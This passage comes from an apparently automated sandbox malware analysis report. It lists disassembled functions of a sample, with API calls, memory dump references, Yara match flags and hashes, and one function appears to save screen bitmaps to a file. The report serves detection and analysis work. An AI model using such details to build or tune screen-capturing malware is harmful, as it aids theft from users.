                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                                                                      Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                                                                                                                                                                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                                                                                                                                                                                                      • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                                                                                                                                                                                                      • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2357751836-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                                      • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                                                                                                                                                                                                      Function 024C50C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C50A3
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C50B7
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
                                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 024C512B
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2395760641-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                                      • Instruction ID: de9c2bc6a11be69392f590823a0bfb6d92b63c10ce212484ea812e8f40420d8f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48219A79814204AFDB91EFA9C4847DDB7B1BF50725F60805FE085AB280DBB49544CF95
                                                                                                                                                                                                                                                                                      Function 024F21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(024CDAD7,024CDAD7,00000002,024EED35,024F3951,00000000,?,024E6A05,00000002,00000000,00000000,00000000,?,024CCF88,024CDAD7,00000004), ref: 024F21CA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F21FF
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2226
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F2233
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F223C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                                      • Instruction ID: 67eb15a8c27e797031767cf46085695d9e825339a492581aabc2770ac0c88d8e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01F936245B017BD392AB355C44E1B262EABC1B72712013FFF15A6391EFF08802852A
                                                                                                                                                                                                                                                                                      Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431FBF
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                                      • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                                                                                                                                                                                                      Function 024F2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a3c51a60d06f16650d1caf8f9120340b81595b8a69831e9c2debcad55390e09
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF0A93554560137D3976735AD08B5B3A2A5BC2F72F15012BFF19923D0EFE58502852D
                                                                                                                                                                                                                                                                                      Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                                                                                                                                                                                                      Function 024D7B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D29A4: TlsGetValue.KERNEL32(?,?,024D0DC2,024D2ECF,00000000,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29AA
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024D7BB1
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024E1241
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024E125A
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024E12D0
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024E12D8
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024D7BBF
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024D7BC9
                                                                                                                                                                                                                                                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024D7BD3
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D7BF1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                                      • Instruction ID: 867b4cbcb40bb9fef121233d3b941c9342489eeb9237402ea33e71104e5b057d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49F0CD31A002186BCE15F6B6883096EF66B9F90B18B00426FD81193350EF759E058E92
                                                                                                                                                                                                                                                                                      Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                                                                                                                                                                                                        • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                                      • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                                                                      Function 024FA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA0C4
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA0D6
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA0E8
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA0FA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA10C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                                      • Instruction ID: e340d9007967ed4bd606896aeee9c1a880dc97dc3131bbcc651501c383917ea9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DF06232505220ABC6F0EF55F9C6C0777DAAA84750764495BF20CD7F11CB71F8908E59
                                                                                                                                                                                                                                                                                      Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                                      • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                                                                      Function 024F1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F19AF
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F19C1
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F19D4
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F19E5
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F19F6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 6869a7c4f8497a9b7b8f534d9fe8f1c4dbe1c2d9472886b302d88895b5fc6f58
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF01D70D003519BEFA16F15AC808053F61AF49B2270002ABF506977B2C774E962DF8E
                                                                                                                                                                                                                                                                                      Function 024DCF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024DCF36
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024DCF67
                                                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 024DCF70
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024DCF83
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024DCF8C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                                      • Instruction ID: b16b1bd0d0456a332b3d340756669b31de222dd3f2c3c1c1776490674a3bfd15
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F03037200900DBC625EF62EAB09BBB7B6AFC4610311455FE58B47690CF21A947DF62
                                                                                                                                                                                                                                                                                      Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043176D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043177E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043178F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                                                                                                                                                                                                      Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
